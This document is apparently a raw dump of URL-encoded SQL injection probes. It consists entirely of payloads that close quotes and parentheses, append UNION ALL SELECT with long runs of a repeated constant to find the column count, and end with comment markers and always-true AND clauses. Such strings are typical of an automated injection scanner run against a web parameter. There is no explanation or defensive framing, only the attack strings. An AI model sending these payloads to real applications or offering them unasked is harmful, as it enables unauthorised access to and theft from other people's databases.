-9017%29%29%20UNION%20ALL%20SELECT%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470%2C%204470--%20%20AND%20%28%288743%3D8743 -5987%29%29%20UNION%20ALL%20SELECT%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066%2C%204066--%20%20AND%20%28%289658%3D9658 -9117%29%29%29%20UNION%20ALL%20SELECT%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123%2C%208123--%20%20AND%20%28%28%281496%3D1496 -2358%29%29%29%20UNION%20ALL%20SELECT%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856%2C%206856--%20%20AND%20%28%28%286584%3D6584 -7431%29%29%29%20UNION%20ALL%20SELECT%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741%2C%204741--%20%20AND%20%28%28%288767%3D8767 -5746%29%29%29%20UNION%20ALL%20SELECT%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837%2C%203837--%20%20AND%20%28%28%284663%3D4663 -9077%29%29%29%20UNION%20ALL%20SELECT%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068--%20%20AND%20%28%28%282072%3D2072 -9881%29%29%29%20UNION%20ALL%20SELECT%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051%2C%204051--%20%20AND%20%28%28%283990%3D3990 -4389%29%29%29%20UNION%20ALL%20SELECT%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743--%20%20AND%20%28%28%282329%3D2329 -6047%29%29%29%20UNION%20ALL%20SELECT%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914%2C%203914--%20%20AND%20%28%28%285295%3D5295 -4372%29%29%29%20UNION%20ALL%20SELECT%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964%2C%209964--%20%20AND%20%28%28%285428%3D5428 -2577%29%29%29%20UNION%20ALL%20SELECT%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107%2C%201107--%20%20AND%20%28%28%284554%3D4554 -8527%20UNION%20ALL%20SELECT%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765%2C%206765--%20 -6157%20UNION%20ALL%20SELECT%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371%2C%201371--%20 -4192%20UNION%20ALL%20SELECT%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647--%20 -1297%20UNION%20ALL%20SELECT%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869%2C%201869--%20 -3584%20UNION%20ALL%20SELECT%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224--%20 -7198%20UNION%20ALL%20SELECT%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124%2C%206124--%20 -8079%20UNION%20ALL%20SELECT%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958--%20 -9983%20UNION%20ALL%20SELECT%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958--%20 -1197%20UNION%20ALL%20SELECT%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552%2C%201552--%20 -4587%20UNION%20ALL%20SELECT%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171%2C%208171--%20 -1428%27%29%20UNION%20ALL%20SELECT%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136%2C%201136--%20%20AND%20%28%27SGfZ%27%3D%27SGfZ -9878%27%29%20UNION%20ALL%20SELECT%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224%2C%208224--%20%20AND%20%28%27qgeJ%27%3D%27qgeJ -4974%27%29%20UNION%20ALL%20SELECT%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393%2C%203393--%20%20AND%20%28%27KrNy%27%3D%27KrNy -8030%27%29%20UNION%20ALL%20SELECT%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215%2C%203215--%20%20AND%20%28%27UCyo%27%3D%27UCyo -2122%27%29%20UNION%20ALL%20SELECT%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326%2C%204326--%20%20AND%20%28%27rAyF%27%3D%27rAyF -1262%27%29%20UNION%20ALL%20SELECT%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058%2C%207058--%20%20AND%20%28%27SdcY%27%3D%27SdcY -1935%27%29%20UNION%20ALL%20SELECT%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754%2C%201754--%20%20AND%20%28%27mBgA%27%3D%27mBgA -4477%27%29%20UNION%20ALL%20SELECT%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004%2C%207004--%20%20AND%20%28%27zuaM%27%3D%27zuaM -1874%27%29%20UNION%20ALL%20SELECT%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796%2C%201796--%20%20AND%20%28%27wjoa%27%3D%27wjoa -2120%27%29%20UNION%20ALL%20SELECT%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257--%20%20AND%20%28%27lqMU%27%3D%27lqMU -6979%27%29%29%20UNION%20ALL%20SELECT%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657%2C%202657--%20%20AND%20%28%28%27ghvl%27%3D%27ghvl -3595%27%29%29%20UNION%20ALL%20SELECT%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556%2C%206556--%20%20AND%20%28%28%27PtWL%27%3D%27PtWL -8473%27%29%29%20UNION%20ALL%20SELECT%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702%2C%209702--%20%20AND%20%28%28%27XPSQ%27%3D%27XPSQ -7139%27%29%29%20UNION%20ALL%20SELECT%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317%2C%206317--%20%20AND%20%28%28%27PGyI%27%3D%27PGyI -4563%27%29%29%20UNION%20ALL%20SELECT%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991%2C%207991--%20%20AND%20%28%28%27ArJa%27%3D%27ArJa -1240%27%29%29%20UNION%20ALL%20SELECT%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036--%20%20AND%20%28%28%27TGZK%27%3D%27TGZK -6489%27%29%29%20UNION%20ALL%20SELECT%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815%2C%204815--%20%20AND%20%28%28%27MEap%27%3D%27MEap -8411%27%29%29%20UNION%20ALL%20SELECT%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698%2C%202698--%20%20AND%20%28%28%27vadg%27%3D%27vadg -2624%27%29%29%20UNION%20ALL%20SELECT%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678%2C%204678--%20%20AND%20%28%28%27GAsf%27%3D%27GAsf -1682%27%29%29%20UNION%20ALL%20SELECT%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365%2C%208365--%20%20AND%20%28%28%27hHQm%27%3D%27hHQm -3557%27%29%29%29%20UNION%20ALL%20SELECT%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992%2C%201992--%20%20AND%20%28%28%28%27uslU%27%3D%27uslU -2316%27%29%29%29%20UNION%20ALL%20SELECT%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852%2C%202852--%20%20AND%20%28%28%28%27cXgQ%27%3D%27cXgQ -7127%27%29%29%29%20UNION%20ALL%20SELECT%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290--%20%20AND%20%28%28%28%27XArt%27%3D%27XArt -5039%27%29%29%29%20UNION%20ALL%20SELECT%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258%2C%202258--%20%20AND%20%28%28%28%27bAOJ%27%3D%27bAOJ -3810%27%29%29%29%20UNION%20ALL%20SELECT%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088%2C%204088--%20%20AND%20%28%28%28%27hJEN%27%3D%27hJEN -4959%27%29%29%29%20UNION%20ALL%20SELECT%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158--%20%20AND%20%28%28%28%27XSvn%27%3D%27XSvn -6520%27%29%29%29%20UNION%20ALL%20SELECT%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924%2C%201924--%20%20AND%20%28%28%28%27VkMd%27%3D%27VkMd -7892%27%29%29%29%20UNION%20ALL%20SELECT%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996--%20%20AND%20%28%28%28%27UAdP%27%3D%27UAdP -2878%27%29%29%29%20UNION%20ALL%20SELECT%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515%2C%203515--%20%20AND%20%28%28%28%27VDMg%27%3D%27VDMg -1167%27%29%29%29%20UNION%20ALL%20SELECT%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054%2C%209054--%20%20AND%20%28%28%28%27rsZH%27%3D%27rsZH -6683%27%20UNION%20ALL%20SELECT%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835%2C%201835--%20%20AND%20%27AHnP%27%3D%27AHnP -5730%27%20UNION%20ALL%20SELECT%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052%2C%204052--%20%20AND%20%27QSqX%27%3D%27QSqX -3026%27%20UNION%20ALL%20SELECT%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687%2C%202687--%20%20AND%20%27AJFX%27%3D%27AJFX -6443%27%20UNION%20ALL%20SELECT%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109%2C%206109--%20%20AND%20%27Zbej%27%3D%27Zbej -6932%27%20UNION%20ALL%20SELECT%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149%2C%207149--%20%20AND%20%27DnMJ%27%3D%27DnMJ -7026%27%20UNION%20ALL%20SELECT%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933--%20%20AND%20%27ugaF%27%3D%27ugaF 